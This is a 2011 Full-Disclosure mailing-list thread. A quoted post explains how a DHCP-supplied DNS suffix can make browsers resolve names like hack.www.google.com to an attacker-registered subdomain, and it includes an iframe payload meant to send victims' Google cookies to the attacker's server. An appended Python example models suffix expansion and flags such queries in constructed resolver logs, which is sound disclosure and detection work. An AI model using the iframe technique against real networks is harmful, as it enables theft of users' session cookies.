Message-ID: <20110513113450.GB2720@DataIX.net>
Date: Fri, 13 May 2011 07:34:50 -0400
From: Jason Hellenthal <jhell@...aIX.net>
To: yu xi4o <evil.xi4oyu@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Dns-suffix may lead to cross-domain and other security problems
yu,
Are you related to MustntLive ?
On Fri, May 13, 2011 at 12:07:37PM +0800, yu xi4o wrote:
> We all know that dhcpd can set the dns suffix for its clients. For example,
> if we set the dns suffix as "test.com", then while doing domain name
> resolution for a name such as www.xxx.com, all the clients using this dhcp
> server will try the following order.
>
> 1. The system tries to look up www.xxx.com; if the dns finds an IP addr, the
> client will go on to use this ip.
> 2. Otherwise, the system will automatically add the dns suffix and have
> another try (this is partly true, cos win7 only adds the dns suffix to dns
> names that don't contain a '.'). This time it will be www.xxx.com.test.com. If
> the dns returns the found addr, the program will happily use this result as its
> right answer. This does bring some convenience, but may lead to some problems,
> for example cross-domain.
>
> Scenario:
> 1. Company A.COM provides secondary domain registration for their customers
> (eg. a free blog system). People can register any username they want, for
> example test. Then his space will be test.A.com. This works fine.
>
> 2. The company's internal network uses a dhcp server which automatically adds
> an A.COM dns suffix to their clients.
>
> An attacker wants to gather some employees' gmail accounts. He then can easily
> register a username like hack.www.google.com; then the full domain name will
> be hack.www.google.com.A.com
>
>
> When A.com's employees browse a web site that contains an iframe such as
> <iframe src="https://hack.www.google.com/accounts" >fuck it up</iframe>
>
> Employees' systems will
> 1. try to resolve hack.www.google.com, then get a false answer (NX Domain).
> 2. then try hack.www.google.com.A.com, which will get the attacker's host IP addr.!!!
>
> But the browser doesn't know this & will happily send google's cookies to
> the attacker's web server.
>
> Success on windows XP / Linux Ubuntu 11.04 with IE, FF, Chrome~:) Failed on win7
> cos it only adds the dns suffix to dns names that don't contain a '.'
>
> GAME OVER!!!
>
> Use your brains and think more potential attack vectors!!
>
> Find more vuls at http://www.wooyun.org/bugs/wooyun-2010-02113
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
Regards, (jhell)
Jason Hellenthal
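Added example (not part of either message in this thread): a small Python model of the two search-suffix policies the original post describes, plus a defender-side check over constructed resolver query log lines. It lets an administrator see which names a given DHCP-supplied suffix would expand, and flag queries of the form <multi-label external name>.<corporate suffix> that the post's scenario produces. The suffix `a.com`, the log format and the query names are constructed for illustration; the allowlist parameter is a hypothetical addition, not something the post mentions.

```python
"""Model DNS search-suffix expansion and flag suspicious suffixed queries.

Constructed example. Policies are modelled on the thread's description:
  * "append always": literal name first, then name + suffix (the XP/Ubuntu
    behaviour the post reports);
  * "single-label only": suffix is appended only when the name has no '.'
    (the Win7 behaviour the post reports).
"""
from typing import Iterable, List


def search_list_candidates(name: str, search_list: Iterable[str],
                           suffix_multi_label: bool = True) -> List[str]:
    """Return the names a resolver would try, in order, for `name`.

    A trailing '.' marks an absolute name and is never suffixed.
    With suffix_multi_label=False, names containing a '.' are not expanded.
    """
    name = name.strip()
    if name.endswith("."):
        return [name]
    candidates = [name]
    if "." in name and not suffix_multi_label:
        return candidates
    for suffix in search_list:
        suffix = suffix.strip().strip(".")
        if suffix:
            candidates.append(f"{name}.{suffix}")
    return candidates


def crosses_into_external_name(name: str, search_list: Iterable[str],
                               suffix_multi_label: bool = True) -> bool:
    """True when a multi-label (external-looking) name would still get a
    corporate suffix appended, i.e. the cross-domain confusion from the post."""
    cands = search_list_candidates(name, search_list, suffix_multi_label)
    return "." in name.rstrip(".") and len(cands) > 1


# Constructed resolver log lines (hypothetical format: "... query <name> <type>").
SAMPLE_LOG = """\
2011-05-13 10:01:02 client 10.0.0.5 query intranet.a.com A
2011-05-13 10:01:03 client 10.0.0.5 query hack.www.google.com A
2011-05-13 10:01:03 client 10.0.0.5 query hack.www.google.com.a.com A
2011-05-13 10:01:09 client 10.0.0.7 query mail.corp.a.com A
2011-05-13 10:01:11 client 10.0.0.9 query www.example.net A
"""


def suspicious_suffixed_queries(log_text: str, corp_suffix: str,
                                allowlist: Iterable[str] = ()) -> List[str]:
    """Defender check over query logs.

    Flags names ending in the corporate suffix whose prefix itself contains a
    dot (so the client was probably suffixing an already-qualified external
    name). Legitimate multi-level internal zones go in `allowlist`.
    Heuristic only; returns sorted unique names.
    """
    corp_suffix = corp_suffix.strip(".").lower()
    allowed = {a.strip(".").lower() for a in allowlist}
    flagged = set()
    for line in log_text.splitlines():
        parts = line.split()
        if "query" not in parts:
            continue
        qname = parts[parts.index("query") + 1].rstrip(".").lower()
        if not qname.endswith("." + corp_suffix):
            continue
        prefix = qname[: -len(corp_suffix) - 1]
        # Skip allowlisted internal zones such as corp.a.com.
        if any(qname == a or qname.endswith("." + a) for a in allowed):
            continue
        if "." in prefix:
            flagged.add(qname)
    return sorted(flagged)


if __name__ == "__main__":
    for policy in (True, False):
        print(policy, search_list_candidates("hack.www.google.com", ["a.com"], policy))
    print(suspicious_suffixed_queries(SAMPLE_LOG, "a.com", allowlist=["corp.a.com"]))
```

The first function reproduces the post's query order; the second makes the mitigation visible: under the single-label-only policy the external-looking name never gets the suffix, so no cross-domain candidate is produced. The log check is the detection side: a query for something like hack.www.google.com.a.com arriving at the internal resolver is the observable trace of a client suffixing an external name.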